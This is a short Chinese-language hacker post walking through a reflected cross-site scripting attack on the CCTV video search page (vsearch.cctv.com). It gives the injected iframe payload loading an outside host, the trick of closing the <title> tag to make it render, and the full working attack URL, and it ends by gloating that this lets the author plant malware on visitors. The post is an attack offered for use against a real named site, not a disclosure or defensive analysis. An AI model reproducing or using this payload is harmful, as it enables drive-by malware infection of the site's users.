进入网站。。搜索处。。写入跨站代码。。提交后跨站效果虽然出来了。。但是。。
他给了我们http://vsearch.cctv.com/这个URL。。毫无利用价值。。于是看看源码。。看看有没有办法。。
<title><iframe src=http://hc8888.anyp.cn width=999 height=999></iframe>-CCTV视频搜索</title>

看。。。虽然下面也有我们的跨站代码。。。但是能够用这个<title>为什么不用呢？` 于是。。再次写入跨站代码

</title><iframe src=http://hc8888.anyp.cn width=999 height=999></iframe><title>  
使<title>语句提前结束。。。提交之后。。这次显示了跨站后的URL.  
http://vsearch.cctv.com/tvsearch.jsp?q=%3C%2Ftitle%3E%3Ciframe+src%3Dhttp%3A%2F%2Fhc8888.anyp.cn+width%3D999+height%3D999%3E%3C%2Fiframe%3E%3Ctitle%3E&dq=%3C%2Ftitle%3E%3Ciframe+src%3Dhttp%3A%2F%2Fhc8888.anyp.cn+width%3D999+height%3D999%3E%3C%2Fiframe%3E%3Ctitle%3E&md=&d=v&vd=&db=forcctv&s=d&lang=&sn=1&t=

.爽。。。这样我们就能够利用他挂马了。。。嘎嘎```